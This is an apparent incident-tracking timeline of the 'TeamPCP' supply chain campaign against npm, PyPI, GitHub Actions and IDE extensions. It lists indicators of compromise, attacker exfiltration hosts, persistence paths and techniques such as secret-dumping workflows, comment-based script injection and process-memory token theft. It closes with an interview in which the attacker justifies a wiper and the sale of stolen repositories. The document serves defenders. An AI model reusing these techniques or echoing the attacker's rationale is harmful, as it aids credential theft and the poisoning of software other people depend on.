community deserves honest, timely communication about incidents like these.
Supply chain attacks represent one of the most serious threats facing the
software ecosystem today. The irony that a security scanning tool was weaponized
to attack the very projects it was meant to protect is not lost on us.

References

Aqua Security Advisory: GHSA-69fq-xp46-6x23

CVE Record: CVE-2026-33634

Aqua Security Blog: What
You Need to Know

Contact: [email protected]

ownCloud GmbH – a Kiteworks Company

Some
important takeaways:


  • No
    customer data was touched or breached

  • If
    you are using a build before March 19, no action is needed

  • If
    you are using ocis-rolling image contact [email protected] you may
    need to take action asap

  • We
    will unfortunately have delays with pushing any new releases and will send
    updates on our progress.

 

Response
and Aftermath

(3 milestones)

Sun, Mar 22- 21:31 UTC

✓ICP Canister DenylistedC2 endpoint
taken down due to policy violation

Wed, Mar 25

Mar 25

"We know over 1,000
impacted SaaS environments right now that are actively dealing with this
particular threat campaign.
— Charles Carmakal, Chief Technology Officer,
Mandiant Consulting

16:50 UTC

✓Spam Flood Accounts RemovedGitHub
removed ~120 accounts involved in the spam campaign.

Thu, Mar 26-13:00 UTC

✓CISA Adds CVE-2026-33634 to KEV
CatalogCISA adds TeamPCP supply chain campaign to KEV catalog. Federal agencies
have 21 days to remediate.

Mar 20-21        CanisterWorm
(npm)

Worm deployed via stolen npm
tokens. 28+ packages infected in <60s; payload harvested credentials and
self-propagated.

35
IOCs

Network
Indicators
-
5

cloudflare tunnels

souls-entire-defined-routes.trycloudflare.comkamikaze v1

investigation-launches-hearings-copying.trycloudflare.comkamikaze
v2

championships-peoples-point-cassette.trycloudflare.comkamikaze
v3/v3.1

create-sensitivity-grad-sequence.trycloudflare.comkamikaze
v3.2/v3.3

 

icp
canister

tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.ioMarch CanisterWorm C2

 

File
Hashes
-
7

canisterworm malware

e9b1e069efc778c1e77fb3f5fcc3bd3580bbc810604cbf4347897ddb4b8c163bindex.js
variant

61ff00a81b19624adaad425b9129ba2f312f4ab76fb5ddc2c628a5037d31a4baindex.js
variant

0c0d206d5e68c0cf64d57ffa8bc5b1dad54f2dda52f24e96e02e237498cb9c3aindex.js
variant

c37c0ae9641d2e5329fcdee847a756bf1140fdb7f0b7c78a40fdc39055e7d926index.js
variant

f398f06eefcd3558c38820a397e3193856e4e6e7c67f81ecc8e533275284b152deploy.js
variant

7df6cef7ab9aae2ea08f2f872f6456b5d51d896ddda907a238cd6668ccdc4bb7deploy.js
variant

5e2ba7c4c53fa6e0cef58011acdd50682cf83fb7b989712d2fcf1b5173bad956deploy.js
variant

 

GitHub
Artifacts
-
6

npm
packages

@EmilGroup/*28 packages compromised

@opengov/*16 packages compromised

@teale.io/[email protected] variant

@teale.io/[email protected] variant

@airtm/uuid-base32compromised

@pypestream/floating-ui-domcompromised

 

Malware
Signatures
-
17

persistence paths

/var/lib/svc_internal/runner.pykamikaze v1

/etc/systemd/system/internal-monitor.servicekamikaze v1

/var/lib/pgmon/pgmon.pykamikaze v3 worm

/etc/systemd/system/pgmonitor.servicekamikaze v3 worm

~/.config/systemd/user/pgmon.serviceCanisterWorm npm

~/.local/share/pgmon/service.pyCanisterWorm backdoor

~/.npmrcharvested for npm tokens

/etc/npmrcharvested for npm tokens

/tmp/.pg_statestate tracking

/tmp/pglogtemp staging

 

kubernetes

host-provisioner-stdDaemonSet

host-provisioner-iranDaemonSet (wiper)

kamikazeContainer (hostPID: true)

provisionerContainer name

 

network
behavior

Scans ports 22, 2375 on local /24worm behavior

/var/log/auth.logparsed for targets

youtube.com connectivity checkkill switch (50-min poll)

 

Payload
Repositories

********Analysis:[JH1] 

 Socket

https://socket.dev/blog/canisterworm-npm-publisher-compromise-deploys-backdoor-across-29-packages

Aikido

https://www.aikido.dev/blog/teampcp-deploys-worm-npm-trivy-compromise

ICP Deep Dive

https://research.veryserious.systems/what-the-hell-is-an-internet-computer-and-why-is-it-in-my-pipeline/

 

Mar
23- KICS & AST
(Checkmarx) - 7 events

Compromised via service account.
126 GitHub Action tags force-pushed to malicious commits; payload stole CI/CD
secrets.

Statement

 (https://checkmarx.com/blog/ongoing-security-updates/)

15
IOCs

TeamPCP Attacks KICS

https://www.wiz.io/blog/teampcp-attack-kics-github-action

                              Phase 08 Checkmarx Ecosystem

                                                            (3
events, 3 milestones)

Mon, Mar
23-
12:53 UTC

Malicious
extensions published to OpenVSX

               Two
extensions pushed via compromised ast-phoenix account, 12 seconds
apart: ast-results v2.53.0 and cx-dev-assist v1.7.0.
Payload checks for cloud credentials before downloading second-stage
from checkmarx[.]zone. VS Code Marketplace unaffected.

12:58–16:50 UTC

35
KICS versions redirected to malicious commits

Attacker
compromises cx-plugins-releases service account (ID 225848595) and
updates all 35 tags (v1 through v2.1.20) to point to staged commits
containing setup.sh credential stealer. ~4 hour exposure window
before takedown.

Mar 23

All
91 versions of Checkmarx/ast-github-action compromised

Attacker force-pushed all 91
existing tags to malicious commits via
compromised cx-plugins-releases account. Same payload as
KICS: setup.sh entry point, credential scraping, encrypted exfil
to checkmarx[.]zone. Checkmarx deleted all versions post-incident, leaving
only clean 2.3.33.

Sysdig

https://www.sysdig.com/blog/teampcp-expands-supply-chain-compromise-spreads-from-trivy-to-checkmarx-github-actions

GitHub Activity Log

https://github.com/Checkmarx/ast-github-action

16:50 UTC

               KICS Repository Taken Down

Community member reports compromise; repo taken offline. ~4
hour exposure window.

18:59 UTC

KICS Repository Restored. Maintainers
confirm incident resolved; repo reinstated.

Mon, Mar 23- 03:38 UTC

Clean OpenVSX Versions Published

ast-results v2.56.0 and cx-dev-assist v1.10.0 published (~15
hours after compromise). Malicious versions still downloadable as of 09:00 UTC.

Sat, Apr 25- 12:00 UTC

Phase
12 LAPSUS
$

 publishes stolen Checkmarx data

                                        (1
event)

Ars
Technica

https://arstechnica.com/information-technology/2026/04/why-a-recent-supply-chain-attack-singled-out-security-firms-checkmarx-and-bitwarden/

Mar 24-             
LiteLLM (BerriAI)~120k downloads- 8 events

Compromised via PyPI token stolen
from Trivy-infected CI. Payload harvested credentials with persistence;
attacker claimed 54GB exfiltrated.

Security
Update

https://docs.litellm.ai/blog/security-update-march-2026

PYSEC-2026-2

https://github.com/pypa/advisory-database/blob/main/vulns/litellm/PYSEC-2026-2.yaml

25
IOCs

 

Three's a Crowd

https://www.wiz.io/blog/threes-a-crowd-teampcp-trojanizes-litellm-in-continuation-of-campaign

 

                                             Phase 10 LiteLLM PyPI

                                                            (5
events, 2 milestones)

Mon, Mar
23-
14:31 UTC

Malicious
workflows pushed via compromised PAT

Attacker pushed Gato-X style
secrets exfil workflows to two BerriAI repos using
compromised krrishdholakia PAT. Both
added .github/workflows/test.yml that dumps all GitHub secrets
via ${{ toJSON(secrets) }}, encrypts with AES-256-CBC + RSA-4096, and
uploads as artifact. Harvested PYPI_PUBLISH token used the next day.

Litellm

404 error page not found

litellm-skills-
Code Commit 81c851c

https://github.com/BerriAI/litellm-skills/commit/81c851cc00313c44effd421712523f294b18391e

Analysis

https://github.com/BerriAI/litellm/issues/24518#issuecomment-4120996414

[Security]: litellm PyPI package
(v1.82.7 + v1.82.8) compromised — full timeline and status
#24518

Tue, Mar 24- 10:39 & 10:52 UTC

Malicious
litellm 1.82.7 & 1.82.8 published to PyPI

Two malicious versions via
compromised maintainer account. 1.82.8: .pth file executes on
Python startup, exfil to models[.]litellm[.]cloud. 1.82.7: same
KICS payload in proxy_server.py → drops p.py, exfil to checkmarx[.]zone/raw.
Both harvest SSH keys, cloud credentials, env vars, crypto wallets. Discovered
when a fork bomb bug in the malware caused a crash.

 

GitHub
Issue

https://github.com/BerriAI/litellm/issues/24512

(code)
[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential
stealer #24512

Futuresearch
(first blog
)

https://futuresearch.ai/blog/litellm-pypi-supply-chain-attack/

vxunderground
(link to X with QRcode)

https://x.com/vxunderground/status/2036534478416298484

HN
Discussion

https://news.ycombinator.com/item?id=47509089

12:44 UTC

Spam
flood targets security disclosure

               ~300
spam comments posted over ~6 hours to bury Issue
#24512
. ~125 accounts used—majority overlap with Trivy spam botnet confirms
same operator. Mix of compromised developer accounts (stolen tokens) and
purchased dormant accounts.

~12:59 UTC

BerriAI
GitHub repos defaced

Via
compromised krrishdholakia account, multiple BerriAI repositories had
descriptions changed to "teampcp owns BerriAI".

14:00 UTC

Malicious
LiteLLM Versions Quarantined

PyPI quarantines litellm 1.82.7 and
1.82.8. 2h 32m exposure window. 119k+ downloads during attack window.

15:35 UTC

PYSEC-2026-2
Published

PyPA publishes LiteLLM advisory.
Project reinstated on PyPI.

Code: https://github.com/pypa/advisory-database/blob/main/vulns/litellm/PYSEC-2026-2.yaml

Wed, Mar
25-2
2:29 UTC

TeamPCP Announces Ransomware Partnerships

TeamPCP claims partnership approach with both Vect
Ransomware Group and Breachforums. Source
https://x.com/IntCyberDigest/status/2036933401240838564
(link to X)

 

                              Response
& Aftermath

                                             (1 milestone)

Wed, Apr 1- 00:00 UTC

✓LiteLLM & Telnyx Adopt Trusted
PublishersBoth projects adopt PyPI Trusted
Publishers
(https://docs.pypi.org/trusted-publishers/)
 post-incident, eliminating long-lived API tokens. Confirmed in PyPI incident report (https://blog.pypi.org/posts/2026-04-02-incident-report-litellm-telnyx-supply-chain-attack/).

 

Mar 27  -  Telnyx 
~750 downloads  -  3 events

Compromised via stolen PyPI
credentials. Payload used WAV steganography to deliver credential stealer.
v4.87.1 contained typo preventing automatic execution; v4.87.2 was fully
functional.

Security
Notice

https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026

PYSEC-2026-3

https://osv.dev/vulnerability/PYSEC-2026-3

32
IOCs

                                             Phase
10 Telnyx PyPI

                                                (3 milestones)

Fri, Mar 27- 07:34 UTC

Telnyx
Packages Quarantined

PyPI quarantines malicious telnyx 4.87.1 and 4.87.2

17:00 UTC

PYSEC-2026-3
Published

https://osv.dev/vulnerability/PYSEC-2026-3

OSV advisory PYSEC-2026-3 published for telnyx supply chain
compromise

Wed, Apr 1- 00:00 UTC

LiteLLM
& Telnyx Adopt Trusted Publishers

Both projects adopt PyPI Trusted
Publishers post-incident, eliminating long-lived API tokens. Confirmed in PyPI
incident report.

Apr 8-22

CanisterSprawl
(npm)
-
1 events

Second-wave npm worm using new ICP
canister (cjn37-uyaaa-aaaac-qgnva-cai). @fairwords compromised Apr 8
(precursor). Main wave Apr 21-22: pgserve, @automagik, @openwebconcept. Worm
discovers npm tokens → bumps patch version → injects self → republishes. npm-to-PyPI
jump via .pth injection when PyPI tokens discovered.

11
IOCs

Analysis:

 Socket

https://socket.dev/blog/namastex-npm-packages-compromised-canisterworm

StepSecurity

https://www.stepsecurity.io/blog/pgserve-compromised-on-npm-malicious-versions-harvest-credentials

Sonatype

https://www.sonatype.com/blog/self-propagating-npm-malware-turns-trusted-packages-into-attack-paths

GitGuardian

https://blog.gitguardian.com/three-supply-chain-campaigns-hit-npm-pypi-and-docker-hub-in-48-hours/

Fri, Apr 24

Apr 25

xploitrs
member "box turtl" interview

               Inside
Darknet publishes interview with box turtl from xploitrs.
Claims: collaborated with TeamPCP on CanisterWorm; persistent access to victims
who haven't rotated; "touched hundreds of billions of dollars worth of
companies."

Apr 22 - Checkmarx KICS Docker Hub- 2 events

Compromised via persistent access
despite Mar 23 remediation. Malicious Docker images pushed; cascaded to
Bitwarden CLI.

Checkmarx
Update

https://checkmarx.com/blog/ongoing-security-updates/

17
IOCs

Wed, Apr 22- 14:00 UTC

xinference
PyPI poisoned (disputed attribution)

Versions 2.6.0, 2.6.1, 2.6.2
contain credential stealer with # hacked by teampcp comment marker.
~600,000 cumulative downloads. Exfiltration
to whereisitat.lucyatemysuperbox.space. TeamPCP denied involvement
via Twitter, claiming copycat.

JFrog

https://research.jfrog.com/post/xinference-compromise/

15:41 UTC

KICS
Docker Images Removed

Malicious digests disabled,
repository restored to March 3 known-good state. Publisher account suspended.

Apr
22
- Bitwarden CLI- 1 events

Cascading compromise from KICS
Docker. Malicious npm package published; payload exfiltrated credentials. No
vault data affected.

 

Bitwarden
Statement

https://community.bitwarden.com/t/bitwarden-statement-on-checkmarx-supply-chain-incident/96127

CVE-2026-42994

https://www.cve.org/CVERecord?id=CVE-2026-42994

14
IOCs

Analysis:

 JFrog

https://research.jfrog.com/post/bitwarden-cli-hijack/

Socket

https://socket.dev/blog/bitwarden-cli-compromised

Wed, Apr 22- 00:00 UTC

Bitwarden
CLI 2026.4.1 Released

Clean version published. Malicious
2026.4.0 deprecated with "DO NOT USE" warning.

Apr 24- elementary-data (PyPI)- 1 events

Compromised via GitHub Actions
script injection. Attacker comment triggered workflow with unsanitized ${{
github.event.comment.body }}, forged signed release via orphan tag dispatch.
~1.1M monthly downloads; same Session ID as LiteLLM/Xinference.

Official
Statement

https://www.elementary-data.com/post/security-incident-report-malicious-release-of-elementary-oss-python-cli-v0-23-3

MAL-2026-3083

https://osv.dev/vulnerability/MAL-2026-3083

19
IOCs

Analysis:

Trend
Micro

https://www.trendmicro.com/en_us/research/26/e/analyzing-teampcp-supply-chain-attacks.html

Fri, Apr 24- 22:10-22:20 UTC

elementary-data
PyPI compromised via script injection

~1.1M monthly
downloads compromised via GitHub Actions script injection.
Attacker realtungtungtungsahur (created Apr 22) posted malicious
comment to PR #2147; unsanitized ${{ github.event.comment.body }} in
workflow granted shell access. Exfil
via trin.tar.gz to igotnofriendsonlineorirl-imgonnakmslmao.skyhanni.cloud.

Apr 29-30- Mini Shai-Hulud- 6 events

Cross-ecosystem attack via stolen
CircleCI tokens. npm, PyPI, Packagist hit in 24hrs; payload targeted IDE hooks
with Russian locale exit.

https://www.wiz.io/blog/mini-shai-hulud-supply-chain-sap-npm

60
IOCs
 
Mini Shai-Hulud Appears

 

                              Phase
13 Mini Shai-Hulud

                                                            (4
events)

Wed, Apr 29- 15:25–17:43 UTC

SAP
npm packages compromised

               Four
packages poisoned within 2-hour window via stolen
CircleCI CLOUD_MTA_BOT_NPM_TOKEN: @cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, mbt.
Russian locale exit (ru_*). Exfil
via OhNoWhatsGoingOnWithGitHub commit markers
to zero.masscan.cloud:443.

GHSA

https://github.com/cap-js/cds-dbs/security/advisories/GHSA-pvw4-cvr4-97p8

Thu, Apr 30- 12:45-13:27 UTC

PyTorch
Lightning PyPI packages compromised

               lightning 2.6.2
and 2.6.3 compromised via stolen PyPI credentials. 42-minute exposure window.
Payload: hidden thread on import, downloads Bun runtime, executes ~11MB
obfuscated JS. Search marker: EveryBoiWeBuildIsAWormyBoi.

Lightning
Blog

https://lightning.ai/blog/pytorch-lightning-supply-chain-attack

GHSA

https://github.com/Lightning-AI/pytorch-lightning/security/advisories/GHSA-w37p-236h-pfx3

Aikido

https://www.aikido.dev/blog/pytorch-lightning-pypi-compromise-mini-shai-hulud

Semgrep

https://semgrep.dev/blog/2026/malicious-dependency-in-pytorch-lightning-used-for-ai-training/

15:00–17:00 UTC

intercom-client
npm package compromised

               [email protected] published
with 11.7 MB router_runtime.js payload. ~2 hour exposure window.
Searches for OhNoWhatsGoingOnWithGitHub commits. 16 Dune-themed
GitHub handles (sardaukar, mentat, fremen, atreides...) as fallback. Repo
description: "A Mini Shai-Hulud has Appeared".

GHSA

https://github.com/intercom/intercom-node/security/advisories/GHSA-54pg-9963-v8vg

veryserious.systems

https://research.veryserious.systems/intercom-client-7-0-4-malware-analysis/

20:53–22:37 UTC

First
npm→Packagist cross-ecosystem spread

               intercom/[email protected] compromised
via stolen credentials. 104-minute exposure window. Exploits Composer plugin
architecture for install-time code execution. Same payload and infrastructure
(zero.masscan.cloud) as npm attacks.

GHSA

https://github.com/intercom/intercom-php/security/advisories/GHSA-gr3r-crp5-qrrm

Intercom
Status

https://www.finstatus.com/

Socket.dev

https://socket.dev/blog/mini-shai-hulud-packagist-malicious-intercom-php-package-compromise

Semgrep

https://semgrep.dev/blog/2026/malicious-intercom-php-package-spreads-mini-shai-hulud-attack-to-packagist-via-composer-plugin/

Response and aftermath – 2 events

Tue, Apr 28

Apr 28

TeamPCP
posts PGP-signed announcement

TeamPCP publishes signed statement
on Tor site. Claims own ransomware locker "CipherForce." Confirms
LAPSUS$ alliance. States "We have never used Vect encryption tools."

Fri, May 1- 13:51 UTC

Intercom
discloses iOS SDK certificate exposureIntercom Status

Intercom confirms Apple
Distribution Certificate used to sign iOS SDK was potentially
exposed. intercom-ios 19.5.6 and 19.5.7 affected. Certificate
revoked, releases re-signed with new certificate.

https://www.finstatus.com/

 

May 9 - Checkmarx Jenkins AST- 1 events

Compromised via persistent
Checkmarx access. Malicious Jenkins plugin injected; payload exfiltrated
pipeline secrets.

Checkmarx
Statement
  (404 error)

https://checkmarx.com/blog/supply-chain-security-incident-update-may-9/

13
IOCs

Fri, May 8

May 9

TeamPCP
leader interview (Inside Darknet)

Key claims: 500K+ machines
compromised; Trivy access came from unnamed partner; ShinyHunters scammed them; 17+
operators; name tributes TeamTNT.

May 7-11- Mini Shai-Hulud II (TanStack)- 5
events

Coordinated multi-ecosystem attack:
TanStack via GHA cache poisoning, Cemu via stolen maintainer credentials, 170+
packages across npm/PyPI in 5 hours. Cascaded to UiPath, Mistral AI, OpenAI,
Grafana, OpenSearch.

CVE-2026-45321

https://www.cve.org/CVERecord?id=CVE-2026-45321

46
IOCs

Mini Shai-Hulud Strikes Again

https://www.wiz.io/blog/mini-shai-hulud-strikes-again-tanstack-more-npm-packages-compromised

                                    Phase 14 Minin Shai-Hulud Strikes
Again

                                                                           (5 events)

Mon, May 11- 11:29 UTC

TanStack
cache poisoned via pull_request_target

Attacker
forks TanStack/router to zblgg/configuration, opens PR #7378 at
10:49 UTC. Multiple force-pushes (11:01–11:11)
trigger pull_request_target workflow. Poisoned pnpm cache saved
at 11:29 UTC, then attacker force-pushes PR back to clean HEAD at 11:31 to hide
tracks.

19:20-19:26 UTC

TanStack
malicious packages published

PR #7382 merged at 19:16 UTC triggers release workflow using
poisoned cache. 84 malicious versions across
42 @tanstack/* packages published in 6-minute window
(19:20:39–19:26:14 UTC). Payload extracts OIDC tokens from /proc//mem. @tanstack/react-router (12M
weekly downloads) affected.

TanStackPostmortem

https://tanstack.com/blog/npm-supply-chain-compromise-postmortem

GHSA

https://github.com/TanStack/router/security/advisories/GHSA-g7cv-rxg3-hmpx

19:46 UTC

TanStack
compromise detected

External researcher opens issue
#7383. Team acknowledges ~20:00 UTC, begins deprecation at 20:19 UTC. Full
scope (84 versions) deprecated by 21:03 UTC. First removal at 22:13:38 UTC.

21:00:19-21:00:26 UTC

UiPath
packages compromised in 7-second burst

61 @uipath/* packages
republished in 7 seconds (21:00:19–21:00:26 UTC) from external attacker
infrastructure. Token stolen ~18:05 via worm in CI pipeline — ~2hr 55min
dwell time before detonation. Root cause: org-wide npm token mounted
across multiple CI repos + inconsistent post-install hardening. First external
signal at ~21:30, unpublish by ~22:30, full cleanup by 03:27 next day. Exposure
window: 21:00 → ~03:30 UTC. No production systems or customer data
accessed. UiPath postmortem → https://tanstack.com/blog/npm-supply-chain-compromise-postmortem

22:45 UTC

Mistral AI packages compromised

            @mistralai/* npm packages
compromised via worm spreading from TanStack. Exposure: npm 22:45–01:53 UTC
(~3hr), PyPI 00:05–03:05 UTC (~3hr). Root cause: compromised developer device,
not Mistral infra. npm versions were inoffensive (nonfunctional
malware), but PyPI [email protected] runs credential harvester on Linux at
import — downloads transformers.pyz from 83.142.209.194. Also
affected: @mistralai/mistralai-azure, @mistralai/mistralai-gcp, [email protected].

Mistral
Advisory

https://docs.mistral.ai/resources/security-advisories

npm
GHSA
  404 error

https://github.com/mistralai/mistralai-client-js/security/advisories/GHSA-jgg6-4rpr-wfh7

PyPI
GHSA

https://github.com/mistralai/client-python/security/advisories/GHSA-wx9m-wx4f-4cmg

 

May 7-8

Cemu
Emulator
-
2 events

GitHub releases compromised via
stolen maintainer (MangelSpec) credentials. AppImage/Ubuntu assets replaced
with credential-stealing payload; geofenced destructive logic targeting
Israel/Iran with 1-in-6 chance of rm -rf.

8
IOCs

Analysis:

Datadog
Security Labs

https://securitylabs.datadoghq.com/articles/backdoored-cemu-release-teampcp-supply-chain-campaign/

Thu, May 7

May 7-8

Cemu
GitHub releases compromised

angelSpec (long-term
co-author) account compromised; Linux AppImage and Ubuntu assets re-uploaded
via GitHub API—first non-bot asset upload in project history. Bypassed CI
entirely, indicating human account token theft rather than ephemeral CI token.
Part of coordinated May 11 attack wave (170 packages across npm/PyPI).

Datadog
Security Labs

https://securitylabs.datadoghq.com/articles/backdoored-cemu-release-teampcp-supply-chain-campaign/

Tue, May 12

Cemu
compromise discovered

Researchers connect Cemu backdoor
to broader Mini Shai-Hulud campaign; maintainers alerted. Same payload
architecture as TanStack/Mistral attacks.

May 18-19 -Mini Shai-Hulud III (Nx & @antv)- 5
events

Nx Console extension compromised
via TanStack-stolen creds (~5-day dwell); 639 @antv npm versions poisoned via
stolen 'atool' account. Payload installed persistent kitty-monitor backdoor.

CVE-2026-48027

https://www.cve.org/CVERecord?id=CVE-2026-48027

112
IOCs

 

TeamPCP Hits AntV Supply Chain

https://www.wiz.io/blog/mini-shai-hulud-teampcp-hits-antv-supply-chain

 

                              Phase
15 Mini Shai-Hulud III (AntV)

                                                            (3
events)

Mon, May 18- 12:30-12:47 UTC

Nx
Console VS Code extension compromised

Malicious [email protected] published
to VS Code Marketplace at 12:30 UTC. Root cause: Nx contributor
installed @tanstack/[email protected] on May 11 20:43 UTC —
attacker exercised stolen GitHub token within 74 seconds. ~5-day dwell
time before publishing malicious extension. pnpm 10.14 silently
ignored minimum-release-age safeguard. 17-minute exposure (VS
Marketplace), 36 min (OpenVSX). ~6,000 activations. Payload: credential
harvester targeting GitHub, npm, AWS, Vault, K8s, 1Password. Persistence
via kitty-monitor daemon. Downstream impact: GitHub
employee infected → ~3,800 internal repos exfiltrated.

Nx
Postmortem

https://nx.dev/blog/nx-console-v18-95-0-postmortem

GHSA

https://github.com/nrwl/nx-console/security/advisories/GHSA-c9j4-9m59-847w

 

19:10-19:31 UTC

actions-cool
GitHub Actions hijacked

actions-cool/issues-helper (53
tags) and actions-cool/maintain-one-comment (15 tags). All tags
force-pushed to malicious imposter commits in coordinated 3-minute bursts.
Payload downloads Bun runtime, reads Runner.Worker process memory
via /proc//mem, extracts secrets tagged isSecret:true.
Exfiltration to t.m-kosche.com:443

StepSecurity

https://www.stepsecurity.io/blog/actions-cool-issues-helper-github-action-compromised-all-tags-point-to-imposter-commit-that-exfiltrates-ci-cd-credentials

Mon, May 18- 01:56-02:56 UTC

AntV
npm ecosystem mass compromise

639 malicious versions across 323
packages published in 22-minute burst via
compromised atool maintainer account. Two waves: 01:39-01:56 UTC
(first wave), 02:05-02:06 UTC (second wave with explicit Bun dependency). Major
packages: @antv/g2, @antv/g6, @antv/x6, @antv/l7, echarts-for-react (~1.1M
weekly), timeago.js, size-sensor. Payload: byte-identical 486-498KB
obfuscated Bun bundle via preinstall hook. Imposter commits injected
via optionalDependencies referencing orphan commits
in antvis/G2.

Wiz

https://www.wiz.io/blog/mini-shai-hulud-teampcp-hits-antv-supply-chain

                              Reponse and Aftermath
(2events)

Mon, May 18

May 18-19

GitHub
internal repositories exfiltrated

GitHub employee device compromised
via poisoned Nx Console VS Code extension. Attacker exfiltrated ~3,800
internal GitHub repositories. GitHub detected and contained the breach on May
18, began rotating critical secrets. No evidence of customer data impact
outside internal repos. Attack chain traced back to TanStack compromise (May
11) which leaked Nx developer credentials.

GitHub Blog

https://github.blog/security/investigating-unauthorized-access-to-githubs-internal-repositories/

Tue, May 19

May 20

TeamPCP
"T" interview (Ransomware Interviews)

Key claims: GitHub repos offered at $50k (highest bid $95k);
confirms LAPSUS$ collaboration; AI-assisted malware writing; exit
signal; Iranian wiper "more for fun." Interview → https://ransomware-interviews.base44.app/interview/teampcp[JH2] 

TeamPCP

May 2026

I will just say you are speaking to T, so I will speak for
myself not my team members.

Q:

Your (currently banned) X account lists Israel as the
location and was created in October 2023. Also, you've deployed the
"Kamikaze" wiper specifically against Iranian victims. At the same
time, you've compromised Israeli companies like Aqua (Trivy) and Checkmarx.
Could you explain the apparent contradiction?

A:

These countries and the people they serve are simply evil.
Iran is a tyrannical regime who murders protesters in cold blood and funds
terrorists while the Israeli government are rampant warpigs who's security
software serves countries with similar behavior which makes them a prime
target. The wiper was more for the lulz, we insert it because we can and if it
does some collateral damage along the way, we will sleep happily. People all
say responding with pick a side, why? I don't negotiate with evil, I am upset
with what these people have turned power and faith into, it reflects badly on
everyone.

Q:

You've collaborated closely with LAPSUS$ and Breached.
Why partner with other groups instead of handling the full life cycle in-house?

A:

There is a lot of access here, it's better to create an eco
system and connections, that way it's easier to sell the data fast and move
access. LAPSUS$ have been good to work with, they are very trustworthy and they
bought everything together to start the op. A lot more is handled in house than
you think but the end result isn't always published under our group names —
usually just the quick one taps/bulk clones.

Q:

In the recent GitHub internal breach you're selling 4,000
private repos for $50k. Why not go directly to GitHub and demand a
significantly higher ransom? What's the strategy behind selling the data
instead?

A:

First come first serve, we do not extort we are simply here
for money upfront as soon as possible. If GitHub wanted the repos private they
would bid high for them like everyone else or ask our BIN price.

Q:

Most ransomware groups focus on encrypting victim files,
but TeamPCP seems to prioritize credential theft, supply-chain poisoning, and
data exfiltration rather than full encryption. Why did you choose this
approach?

A:

TeamPCP was initially an encrypt and extort group, it's
simply not necessary anymore, we get paid the same either way while taking much
less time and doing far less destruction to the businesses. I would also add
after the Vect failure, we are far less interested in encryption after seeing
the results we can achieve without it, this stopped us from pursuing it
entirely.

Q:

Since you became active, roughly how many organizations
have been impacted by your campaigns? Do you think the stolen credentials and
tokens lose value over time as developers realize they've been compromised and
start revoking keys?

A:

Tens of thousands of companies have been impacted, the
number of developers likely in the millions. Credentials that expire sooner and
large orgs are prioritized. If companies mass revoked as seen previously, then
it's not a worry — we would just find another way in the supply chain.

Q:

What inspired TeamPCP to start these operations in the
first place? Were any of you previously on the "legal" side of
cybersecurity? If yes, what made you cross over to the other side?

A:

I tried to find work doing legal offensive operations,
contract type work before this campaign and my would-be employer did something
extremely unethical, so I continued blackhatting separately. Otherwise this
would have played out very differently but yes I wanted to previously and still
would like to pursue something like this. The heat is not good to have on you
and I've made enough money to eat, house myself and take care of my team. Some
of us have even started donating our earnings because we simply don't need it
to survive anymore and that's all that matters. We don't want to or need to be
rich and we don't like causing damage to people but poor security pays.

Q:

Your campaigns show an extremely strong focus on
supply-chain attacks. What practical advice would you give to organizations and
developers on how to defend against attacks like these?

A:

Minimum release age, pin releases to hash, fine grain
tokens, know what or limit extensions your developers are using in their IDEs.
Socket will find the malware before the package is mature enough to hit your
machine and publish all of the IOCs/remediation steps for you or your company's
blue team should you get hit.

Q:

Threat actors like you constantly face better defenses,
law enforcement pressure, and faster incident response. What's your long-term
strategy for staying operational, and evolving faster than the defenders?

A:

We will always adapt against the blue team. With law
enforcement, my risk/reward ratio tells me my time has come soon to stop
operating.

Q:

Do you use AI tools in any part of your operations?

A:

Yes, we both code our malware by hand and with the
assistance of AI. Studying the different mechanisms used in the tools we are
exploiting are all done by a human. You can give any skid an LLM and they
wouldn't be able to replicate these attacks even with the source code and
postmortems fully public — which speaks for itself.

Q:

Is there anything else you'd like to say or share with my
followers (40k)?

A:

Let the results speak.

Q:

Bonus question 😊 I noticed your Tox
nickname is "the jellyfish who jumped up the mountain" — a reference
to the Shpongle track (right?). According to Simon Posford, the title refers to
a Darwinian evolution metaphor: even a jellyfish can climb a mountain one tiny
step at a time over millions of years. What's the story behind choosing this
name? Does this gradual-evolution metaphor connect in any way to TeamPCP's
philosophy or operations?

A:

Well, my circumstances weren't too great and I just kept
going and learning as much as possible, trying to exploit software, writing
malware and fucking up, sometimes without money for food or rent 24/7/365. I am
the jellyfish who jumped up the mountain.

 

May 19- DurableTask (Microsoft) ~2k downloads- 1
events

Compromised via PyPI token stolen
in AntV campaign. Payload targeted AWS SSM and K8s for lateral movement.

16
IOCs

DurableTask Supply Chain Attack

https://www.wiz.io/blog/durabletask-teampcp-supply-chain-attack

 

Phase 16 DurableTask (Microsoft) 1
event

Tue, May
19-
16:19-16:54 UTC

Malicious
durabletask versions published

3 malicious versions published
to PyPI in 35-minute window: 1.4.1 (16:19 UTC), 1.4.2, 1.4.3 (16:54 UTC).
Payload: rope.pyz targeting AWS SSM and K8s for lateral movement. All
versions now yanked.

Jun 1-26

Miasma
/ Hades
- 14 events

Multi-wave cross-ecosystem attack.
Wave 1: 90 malicious npm versions via OIDC publishing abuse. Wave 2:
binding.gyp technique bypassing install script detection. Wave 3: additional
npm accounts compromised. Wave 4 (Hades): crossed to PyPI via .pth startup
execution, 37 wheels across 19 packages.

RHSB-2026-006

https://access.redhat.com/security/vulnerabilities/RHSB-2026-006

Maintainer
Account

https://dev.to/icflorescu/the-bot-that-never-was-2mfp

12
IOCs

Miasma Supply Chain Attack

https://www.wiz.io/blog/miasma-supply-chain-attack-targeting-redhat-npm-packages

 

                              Phase
17 Miasma/Hades
12 events

Mon, Jun 1- 10:53-14:24 UTC

First
wave: OIDC publishing abuse

Attacker exploits npm OIDC trusted
publishing via ephemeral branches. 9
documented oidc-* branches created (each lasting 1-73 seconds)
with counterfeit .github/workflows/ci.yml configured
with id-token: write. npm validates workflow filename only, not branch
protection status. 90 malicious versions across 32 packages published
with valid SLSA provenance (~80k weekly downloads). Exfil repo
fingerprint: Miasma: The Spreading Blight → Miasma : The
Spreading Blight (space before colon) after firedalazer dead-drop
activation.

15:54-20:24 UTC

Branch
poisoning escalation with IDE persistence

Attack escalates beyond package
publishing. Malicious commits pushed to live feature branches
(switch-rbac-new-builder, update, RHCLOUD-30109, api-info-spec-update, js-clients-bump)
with [skip ci] flags. Deploys 4.2 MB offline loader
